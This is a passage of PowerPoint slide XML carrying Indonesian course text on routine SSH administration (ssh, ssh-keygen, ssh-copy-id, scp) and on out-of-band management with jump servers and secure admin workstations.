              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193459807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Perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server SSH di 10.1.0.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bernama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "bobby" dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ssh bobby@10.1.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalinnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ssh-keygen -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rsa</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ssh-copy-id bobby@10.1.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada prompt SSH, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shell Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bobby@10.1.0.10:/logs/audit.log audit.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Balikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>argumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subdirektori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekursif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> -r.</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215278155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Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di Luar Band dan Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lompat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, router, firewall, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SAW) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - browser web minimal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> terminal virtual SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SAW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Internetnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch, driver, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunduk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
